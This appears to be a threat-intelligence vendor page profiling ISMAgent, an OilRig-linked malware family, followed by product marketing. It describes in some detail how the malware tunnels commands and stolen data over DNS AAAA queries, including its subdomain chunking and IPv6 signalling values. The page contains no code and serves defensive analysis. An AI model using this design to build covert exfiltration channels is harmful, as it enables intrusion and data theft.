ISMAgent
ISMAgent is an OilRig-associated malware family used for command-and-control over DNS, with HTTP as another C2 channel and DNS tunneling used as a fallback when HTTP is unavailable. According to the provided content, ISMAgent issues DNS AAAA requests using the DnsQuery_A API and communicates with actor-controlled domains via specially crafted subdomains. It generates a unique session identifier with CoCreateGuid and uses a hyphen-stripped GUID in its beacon structure. The malware base64-encodes system data with character substitutions and transmits it in 13-character chunks within DNS subdomains, then signals completion with an "n.<count>.f" query. It uses hardcoded IPv6 acknowledgement values, including a67d:0db8:a2a1:7334:7654:4325:0370:2aa3 to indicate operational readiness and a67d:0db8:85a3:4325:7654:8a2a:0370:7334 to continue sending data. ISMAgent determines the number of download queries to issue by parsing the last two hexadectets of a C2-provided IPv6 address beginning with a67d:0db8:85a3:4325:7654. The content states that ISMAgent can receive commands embedded in IPv6 answers, including examples that execute PowerShell to write to C:\Users\Public\file.txt and later upload that file’s contents through the DNS tunnel. The malware is part of OilRig’s broader malware arsenal, and the provided material associates OilRig with spear-phishing, supply chain attacks, and DNS-tunneling tradecraft.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
ISMAgent uses the DnsQuery_A API function to issue DNS AAAA requests to resolve custom crafted subdomains at an actor owned domain to send data to and receive commands from OilRig.
ISMAgent uses the DnsQuery_A API function to issue DNS AAAA requests to resolve custom crafted subdomains at an actor owned domain to send data to and receive commands from OilRig.
Techniques & procedures
6 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
1 technique"The Helminth Trojan came in two forms, a portable executable version and a PowerShell version"; "...ISMAgent... would run a PowerShell script..."; "QUADAGENT... obtain a PowerShell script that it will replace itself with"; "BONDUPDATER... download a new PowerShell... script"
Stealth
1 technique"The two encoding methods used by these tools... base16 and base64"; "...custom base64 encoder to strip out non-alphanumeric characters"; "...encoding mechanism... splits each hexadecimal byte into two nibbles..."
Discovery
2 techniques"The Trojan will first create a unique system identifier by executing the 'whoami' command"; "...base64 encoded computername\username"
"ALMA... gathering the user name and windows product key"; "...dot variant also gathers the computer name and the serial number of '\\.\PhysicalDrive'"; "...send system specific data... <domain>\<username>:pass"
Command and Control
1 technique"Depending on the tool, A, AAAA, and TXT query types have been used by OilRig for tunneling" and "...use DNS queries to resolve specially crafted subdomains... and the answers... to receive data from the C2." | "...malware can use DNS queries and answers to act as a command and control channel... tools that rely on DNS tunneling used by an adversary known as OilRig."
Exfiltration
1 technique"...upload the results to the C2 via the DNS tunnel"; "...exfiltrate the contents of each file in this folder"; "...upload its contents to the C2 server"; "...transmitting data to the C2 in the queried subdomains"
IOCs tracked for this family
5 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
ISMAgent is a malware sample detected in the analysis, but specific details are not provided in the content.
Backdoor malware used by OilRig to support stealthy command and control operations.
DNS-tunneling trojan using AAAA queries (IPv6 answers) for C2. Uses a GUID-based session ID, uploads host/user info and file contents via base64-in-subdomain chunks, and receives commands/data encoded into IPv6 responses.
Falls back from HTTP-based C2 to DNS tunneling when HTTP C2 is unreachable.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.